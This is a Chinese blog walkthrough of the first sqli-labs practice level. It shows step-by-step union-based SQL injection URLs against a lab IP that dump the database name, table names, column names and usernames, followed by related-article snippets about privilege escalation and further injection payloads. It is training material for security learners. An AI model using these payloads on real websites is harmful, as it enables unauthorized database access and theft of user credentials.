SQL注入实验——web靶机第一关

最新推荐文章于 2024-08-27 22:16:59 发布
最新推荐文章于 2024-08-27 22:16:59 发布
阅读量2.9k 收藏 5
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41554179/article/details/88372804
版权
  1. 测试交互方法(此靶机为get);
  2. 判断字符类型;(此靶机没报错,为字符型)
    在这里插入图片描述
  3. 构造闭合(次靶机闭合为 ‘ );
    在这里插入图片描述
  4. 爆库名;
    http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+
    在这里插入图片描述
  5. 爆表名;
    http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(table_name) from information_schema.tables where TABLE_schema = 'security' --+

在这里插入图片描述
6. 爆列名;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(column_name) from information_schema.columns where TABLE_name = 'users' and table_schema = 'security' --+
在这里插入图片描述
7. 爆数据;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(username) from users --+
在这里插入图片描述

滑稽的炸薯条
关注
专栏目录
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
权限提权——Win提权漏洞及数据库&AT&SC&PS提权
m0_61506558的博客
10-12 694
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要提升自己的权限,就得在后台页面中寻找漏洞利用的点,成功上传webshell提升权限.(一)权限提升权限介绍​ 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
sql注入第一关
computet_的博客
01-29 1343
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。
pikachu靶机
最新发布
m0_65590325的博客
08-27 1680
实习期任务
SQL注入第一关
qq_73940312的博客
01-28 785
由之前的查询结果猜测users表大概率存有管理员账户及密码,所以使用id=-1' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema=database() -- + 可以查询到users表内的列名。再使用id=-1' union select 1,2,3 -- + 得知输出的数据对应的是第2和第3列。
sql注入sqli-labs第一关
nixiaoge的博客
08-05 955
注入:都是合理合法的MySQL执行语句产生的原因:对于输入没有做过滤,导致意外的查询语句进到了程序中,查询出来了本不应该查询的数据。
sqli-labs-master第一关sql注入
你的小粉丝的博客
07-25 1276
先了解一下数据库 先登录账户,输入密码 之后可以看到N个数据库 打开数据库可以看到N个表 每个表里还有N个字段 除了用sql语句查看,当然也可以用MySQL等直接查看 开始步入正题 sql注入 url处先尝试着输入?id=1; 再尝试?id=2; ...
SQL注入之MSSQL注入MSSQL⼿⼯注⼊
12-29
本文将重点讨论针对Microsoft SQL Server (MSSQL)的手工注入技术,并通过一个具体的示例——MSSQL-SQLi-Labs站点的第一关——来进行深入分析。 #### 二、实验环境与工具介绍 - **实验环境**: - 攻击者(宿主机)...
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
HTB靶机之Oopsie
m0_46412682的博客
09-01 1586
HTB靶机之Oopsie 1、VPN connection 2、信息收集 ①masscan端口扫描 sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28 ②nmap扫描端口对应的服务 nmap -sC -sV 10.10.10.28 开放了22端口和80端口 操作系统是:linux 3、访问80端口 没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the s
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
sql注入靶场.zip
06-24
sqli-labs-master,在github下载不了的可以在这下载
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2096
SQL注入闯关
sql字符型注入-sqli第1关
weixin_46784800的博客
11-04 434
sql注入知识 dvwa 1' order by 1# 1' order by 2# 1' order by 3# 排序 1' union select 111,222,333 ---可以查看前端与数据库之间的联系,即数据库在前端显示的出口! 1' union select database(),user()# 联合查询 database() 查询数据库名字 user() 返回当前查询的用户名 1' union select version(),@@version_compile_os# ver
SQL注入:sqli第一关详细讲解
m0_50818626的博客
05-23 1325
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
Sqli-labs 靶机注入训练(1-5)
qq_41819426的博客
12-03 4276
Sqli-labs靶机注入训练1、sqli-labs 环境搭建什么是sqli-labs?环境搭建1.下载sqli-labs2.phpstudy(PHP+mysql环境搭建)①首先先下载一个PHPstudy②把你的sql-labs.zip解压到这个PHPstudy的根目录底下3、修改 db-creds.inc 里代码④访问http://sqli/(访问域名,你放在哪个文件夹就叫什么) 来进入sqli-labs的首页常见问题:2.less -13.less -24.less -35.less -46.less
Sqliabs注入过程
weixin_71398630的博客
08-05 611
提示请输入你的id:首先sql注入输入的数据都是合理的查询语句。产生原因是由于没有对用户的输入做过滤,导致意外的查询语句进入到了程序中,查询到了本不应该查询到的数据。尝试闭合,加上后可以发现报错,说明闭合成功,再加入注释符号,使后面的程序不生效,mysql的注释符号有三种:--空格/***/;使用--+ 的原因是,在url中,会被解析为空格,而直接加空格会被忽略;接下来就可以构造查询语句:首先查询表的列数:使用order by。
网络安全04-sql注入靶场第一关
m0_68976043的博客
01-28 2180
sql注入环境,这个环境网上很多教程,其大部分基本都是小皮面板加漏洞环境放在WWW目录下,搜一下很容易就搭建出来了,这里就不详细讲述了,最后搭建下来的图片如图所示。
sql注入攻击技术的靶机
08-31
SQL注入攻击技术的靶机是一个用于模拟和演示SQL注入攻击的系统或应用程序。靶机通常存在安全漏洞,可以被攻击者利用进行SQL注入攻击,以此来加深对SQL注入漏洞的理解和防御技巧。 以下是一些常见的SQL注入漏洞靶机: 1. WebGoat:WebGoat是一款基于Java的Web应用程序,旨在帮助开发人员和安全专家学习和测试常见的Web应用程序安全漏洞,包括SQL注入。它提供了一系列具有漏洞的任务和教学材料,供用户学习如何利用和防御SQL注入攻击。 2. DVWA:Damn Vulnerable Web Application(DVWA)是一个针对Web应用程序安全测试的开源项目。它包含一系列易受攻击的漏洞,包括SQL注入漏洞。用户可以通过攻击DVWA来学习如何利用SQL注入漏洞,并探索不同类型的攻击方法和防御技术。 3. bWAPP:bWAPP是一个用于测试和评估Web应用程序安全性的平台。它包含了多个易受攻击的漏洞,包括SQL注入漏洞。用户可以在bWAPP中模拟和演示SQL注入攻击,以及学习如何修补和预防这些漏洞。 这些靶机都是为了教育和提高安全专家和开发人员对SQL注入攻击的认识,并帮助他们学习如何有效地防御这些攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值